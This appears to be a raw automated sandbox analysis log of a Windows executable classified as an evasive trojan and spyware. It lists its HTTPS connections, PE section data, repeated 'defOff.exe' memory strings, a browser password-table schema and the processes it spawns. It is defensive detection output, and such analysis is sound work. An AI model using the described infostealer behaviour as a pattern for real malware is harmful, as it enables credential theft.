            Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
            Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
            Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
            Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
            Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49712 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.6:49713 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49719 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49720 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49720 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49726 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49739 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49750 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49752 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49757 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.6:49762 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49766 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49770 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49781 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49809 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49810 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49843 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49852 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49897 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.6:49910 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49934 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50011 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50023 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50097 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50096 version: TLS 1.2

            System Summary

            barindex
            Source: file.exeStatic PE information: section name:
            Source: file.exeStatic PE information: section name: .idata
            Source: file.exeStatic PE information: section name:
            Source: file.exeBinary or memory string: OriginalFilename vs file.exe
            Source: file.exe, 00000000.00000003.2529490959.000000000629F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2525097432.00000000061A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2528856906.000000000629E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2533767207.00000000062D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2528981513.0000000006198000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2518741093.0000000005F92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2521307238.00000000061A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2527458199.000000000628C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2549551797.0000000005CE2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2549853053.000000000176E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2521228143.000000000624F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2532399287.00000000062B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2529232792.00000000063AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2522445606.000000000630E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2528727583.0000000006199000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2525602441.000000000619B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2531369517.0000000006198000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2529757517.000000000619A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2524382169.0000000006263000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2536001191.00000000062E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2526907420.000000000628E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2527982563.000000000628C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2520347670.0000000005DE7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2520479499.00000000061A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2549895814.0000000005CFD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2527593187.000000000619C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2527814118.0000000006192000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2522621297.000000000624C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2529618699.00000000063AB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2528155712.0000000006193000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2549799899.0000000001785000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2525775555.0000000006280000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2549828032.0000000001778000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2523363932.0000000006263000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2530284001.00000000062A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2532802834.00000000062D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2530789713.00000000062B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2549439109.0000000005D1F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2523581265.0000000006271000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2551794749.0000000006195000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2524559275.0000000006196000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2532669107.0000000006197000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2521395321.0000000006251000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2532144498.00000000062C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2524746904.0000000006263000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2522719485.0000000006194000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2528315460.000000000628F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2535715148.0000000006194000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2529902437.00000000062A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2530480491.0000000006195000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2531916555.00000000063ED000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2529107393.000000000629F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2524008574.0000000006270000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2521140246.00000000061A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2532270738.0000000006192000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2520707537.0000000005DE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2530072282.0000000006198000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2531239143.00000000063C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2523080743.0000000006259000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2534993552.00000000062D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2524132326.000000000619D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2523173510.000000000631E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2527698004.0000000006284000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2521564057.0000000006246000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2522902873.0000000006309000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2532939536.0000000006196000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2533209683.0000000006411000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2520555220.0000000005DE2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2528563199.000000000638B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2533375666.000000000619C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2526503377.000000000628E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2549398986.0000000005DA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2518806974.0000000005DEE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2521752639.0000000006192000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2535168108.000000000619A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2527180581.0000000006199000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2525431691.000000000627A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2520787436.000000000619D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2523265460.000000000619B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2532043756.000000000619B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2536201227.000000000642C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2521663269.0000000006301000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2535334766.00000000062D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2534627282.0000000006195000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2531092436.00000000062AB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2523758664.000000000619D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2535500490.0000000006421000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2520628068.0000000006193000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2532531608.00000000063EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2529360624.0000000006195000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2520873217.0000000005DED000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2522533867.0000000006192000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2533071975.00000000062D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2523467878.000000000619A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2530965425.0000000006196000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2531633832.0000000006197000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2522364192.000000000624E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2521476750.000000000619A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2521052642.0000000005DED000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2522811673.0000000006247000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2525935391.000000000635F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2524928589.000000000633B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2518882409.000000000619A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2522989150.0000000006198000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2526722062.000000000619A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2526200892.00000000061A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2520965971.000000000619F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2531762200.00000000062BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exe, 00000000.00000003.2531504242.00000000062B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: file.exeStatic PE information: Section: ZLIB complexity 0.9974860767326733
            Source: file.exeStatic PE information: Section: ihjtxazo ZLIB complexity 0.9943142095081213
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@24/64@9/6
            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: file.exe, 00000000.00000003.2296649290.0000000005D18000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2323057182.0000000005D25000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2323309647.0000000005D18000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2297276146.0000000005CFA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: file.exeReversingLabs: Detection: 44%
            Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=1880,i,2658369671924741548,14956457475855153189,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=2000,i,6861188437534111061,5673823380615513189,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=1880,i,2658369671924741548,14956457475855153189,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=2000,i,6861188437534111061,5673823380615513189,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
